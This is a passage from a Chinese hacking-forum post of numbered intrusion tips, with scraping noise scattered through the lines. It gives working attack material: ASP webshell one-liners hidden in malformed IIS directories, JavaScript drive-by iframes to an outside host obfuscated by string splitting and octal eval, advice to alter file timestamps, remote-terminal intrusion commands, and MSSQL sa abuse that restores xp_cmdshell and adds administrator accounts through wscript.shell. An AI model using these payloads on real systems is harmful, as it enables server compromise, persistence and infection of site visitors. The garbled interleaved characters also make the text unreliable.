用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。7 _- K4 [! ?; ?: H4 B( h. b
/ e& i7 v- r' e5 O
53、隐藏ASP后门的两种方法. {" M+ `7 c, n: W ~ b c
1、建立非标准目录:mkdir images..\
; G: ~' n+ u$ ^0 @2 {拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp8 N5 |; p4 Z* X) V" {) \
通过web访问ASP木马:http://ip/images../news.asp?action=login
H2 r/ n. \3 m如何删除非标准目录:rmdir images..\ /s
# S) B$ F4 e" |# ?2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:) R* P6 E8 S8 r4 a; ^- P3 x& `, p
mkdir programme.asp
3 w# Y( {1 }$ w! P1 d( z新建1.txt文件内容:<!--#include file=”12.jpg”-->1 Y: z6 _3 R7 r3 e/ L' X/ F
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件& [" M. @' x1 `* ?" K6 I
attrib +H +S programme.asp# O7 W( g5 D' E- t& R
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt" L- \5 l( @- a8 d6 J. t) k+ |' D
% {* G/ |1 W& Q8 d
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。0 P' D% h% J& U* A
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。! N5 e# J2 B3 L5 \: k& K
7 q \. P. ], s9 q( ]55、JS隐蔽挂马
8 _( V0 b' A& b4 x( a) I+ `7 j$ L4 ]$ V1.
% K7 m7 y; z7 }; |. o, a0 j) _var tr4c3="<iframe src=ht";
1 @- j' { m# |* Ltr4c3 = tr4c3+"tp:/";
3 x8 I% V1 x8 a2 U y% k& m! |" Qtr4c3 = tr4c3+"/ww";
8 m. c, @, k x, V5 n. n1 }1 ytr4c3 = tr4c3+"w.tr4";" b# X' Q8 r: k' m
tr4c3 = tr4c3+"c3.com/inc/m";
: N, j5 N6 ` u7 J) Gtr4c3 = tr4c3+"m.htm style="display:none"></i";
6 f! m D9 q4 _! O6 D! W7 Ltr4c3 =tr4c3+"frame>'";
0 x) V+ ?7 t+ v5 m4 H+ d: adocument.write(tr4c3);. n* ]/ O& u/ w; m# B) R9 |1 N
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。5 c9 _- Z: N4 E: F% X% w8 a
! ~! ~1 k0 C% Z @8 |# {9 \' n2 y
2.
/ j9 A p( b& w$ a- O e0 V转换进制,然后用EVAL执行。如% I: {- Q! @7 j9 P8 r+ }
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
! H$ n! Z1 o% I! C, P4 L5 A# R: \不过这个有点显眼。
( ]1 ~6 a% }+ E# ~3.: \- s/ p* j! d8 L9 D" ]4 J
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' M/ L4 O L% r: q最后一点,别忘了把文件的时间也修改下。4 a) C! r4 O9 T7 g$ d* Y
6 n/ m9 N6 L4 o) n
56.3389终端入侵常用DOS命令% L( ^1 X( l1 `' \/ D7 d! L# T4 V
taskkill taskkill /PID 1248 /t' v' y7 h1 L) t
# G a: _9 `( b# x
tasklist 查进程
9 W. J* e! U1 j1 i# \
7 @& j. C" g. S) _& O& H# H$ Xcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限6 K9 t, T0 W& K$ X; ~
iisreset /reboot
$ w% _. T& ]- H" @( |tsshutdn /reboot /delay:1 重起服务器5 k3 O( r+ `% S7 o
) s* `" ~: Z; a: l( \; ~2 ] z
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
6 N& B1 S2 G0 A- O. s' k3 t4 P1 V" w# n$ E9 y
query user 查看当前终端用户在线情况* W6 C( Z+ z; K. D* N" C4 Z
9 {- d, e: F3 G2 J: s要显示有关所有会话使用的进程的信息,请键入:query process *
& v Q x( M) D5 L1 W/ L/ Q f$ \. E% m
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
- ?+ Q0 C0 s& a/ d) h4 }* ^
: N: u9 M0 g3 ?; ?要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
$ L( b4 k- L! J* j0 q' K5 n B3 U4 A' P. o
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM026 s; L9 A( A# e( F5 r3 N
- W- r8 G+ i& t2 r7 P4 [
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
1 P4 V$ T9 S0 K; I1 ?8 ^% C+ B# m5 I. Z
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统& a% w- [8 c# S q
* _0 l# M. r n. ]' b
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 o, N. M9 _* z) G; t: _- i: {
4 g# i2 O; {" O# Y命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机4 n6 M' q. E# J8 g7 J f
1 f3 \4 z N2 C! _
56、在地址栏或按Ctrl+O,输入:6 V3 b% P6 A( [; x6 O- ]. Z
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
& e( S! g% Y8 t3 W9 c4 o! ^; ~! h2 e( D: c: i
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。9 W0 ?: A+ a+ e6 f
4 G# t; z. p; x& q, y( f57、net user的时候,是不能显示加$的用户,但是如果不处理的话,8 W3 `- K. I! J3 L" |" D2 O
用net localgroup administrators是可以看到管理组下,加了$的用户的。
) c8 Y( S: X" w! L! A. J$ a4 T$ y( ^) K' G
58、 sa弱口令相关命令) c: \2 a! [5 I. r4 }" l
( R; p4 _8 V& v一.更改sa口令方法:
/ C' ?) W0 s: j6 S* r. Z用sql综合利用工具连接后,执行命令:4 } i; g- Y2 G" h0 Z* i2 i
exec sp_password NULL,'20001001','sa'
2 _, U3 g" [& a# e V, N0 `(提示:慎用!)
5 v6 a2 z6 e+ q0 P2 N$ C2 c% D. j7 g
二.简单修补sa弱口令.
" L6 `. x2 x) x5 _
+ `3 p5 N* F, O方法1:查询分离器连接后执行:4 H6 F; a. e" f8 P( }$ [& b! ?9 k
if exists (select * from
. k# ?: {8 T/ j, h5 h/ a: qdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and! O+ p; q/ q/ l8 M
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)7 w$ f* T- }# ]
4 c; n6 K+ [& O6 aexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
4 w2 V) y1 a6 S4 C8 y$ ^& J) ?- n+ ]& Z4 l5 A" G0 R. | }
GO
% h; d5 Z& k9 t! @# S0 \
, f4 M N( L6 x6 M) z4 A然后按F5键命令执行完毕
6 r# V# H% ~ M, q% i: N' q0 u8 B& ?: U4 n
方法2:查询分离器连接后) X2 _2 e$ a4 N* B- I6 U& c/ z& A
第一步执行:use master
$ E( I( [# S$ L8 j第二步执行:sp_dropextendedproc 'xp_cmdshell', V9 H) @4 T! d: s) N4 Q
然后按F5键命令执行完毕' `. c: _+ r2 {& m: ~( o8 V8 v
& C; p* P: {5 s2 m
( w7 F/ C, Z4 k* n* Y/ J
三.常见情况恢复执行xp_cmdshell.4 u. n1 m2 x9 A+ ^1 W5 U0 Q5 s
o8 i$ d- F7 T9 Z, u' ] q
- _; d; S$ G* |% k# L0 M0 b1 未能找到存储过程'master..xpcmdshell'.
6 J" C1 u% R1 _. V. s t4 Q 恢复方法:查询分离器连接后,
" s- M! v6 [- ^# C第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
0 v- L" o0 G# @) y5 ]% L: Y7 g' C第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' R* z& t; Y. n0 [- k6 ~3 s9 w
然后按F5键命令执行完毕, V4 L/ j1 z* r1 i# _ _+ g
5 v2 @( @8 Y. @5 R, A: l
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
" a: u, I2 \, _$ `$ [* ]恢复方法:查询分离器连接后," z8 h* e5 G. L( J
第一步执行:sp_dropextendedproc "xp_cmdshell"$ \$ M" W2 g0 e4 o& @
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ H, v! U1 D5 M( Y然后按F5键命令执行完毕+ Y' e2 H3 @7 G$ ]3 A
) p" ?0 w2 {3 S2 h5 W+ E* N3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
) m# Y# H) K% l2 A; L恢复方法:查询分离器连接后,
! t6 M7 g% A% g9 S" u1 R第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
t: N$ X0 d( O" y8 O8 J. P3 \第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 5 |9 Q& {- g, m% m2 Q m/ b% ~1 ^
然后按F5键命令执行完毕
$ E+ I1 r% d% J& I
, B$ t/ J3 S, s; L4 S* F四.终极方法.
6 M4 I3 j6 H* _, Q) J0 S如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:6 E ^; I! P5 y/ x5 L
查询分离器连接后,
1 K6 Q H0 c4 }2000servser系统:
! S, L2 r0 o- F0 H+ _. N3 _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
: G) V+ G/ ^: O4 H& z5 _: x* l0 ^3 ~1 y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ w) e2 Y! \+ B
N9 j7 c" ^; a/ b' @5 P2 ]
xp或2003server系统:
" N4 s* Y! U* \! x2 z5 k+ p/ T4 G1 W2 X" {3 ~0 R4 I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'1 p* q% E! G0 t; r" ]9 n* }7 U/ e
- u4 p+ u2 Y$ K* m7 F$ m, ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ e, ]/ |1 `1 F" M @
|
发表于 2012-9-15 14:51:03
收藏
支持
反对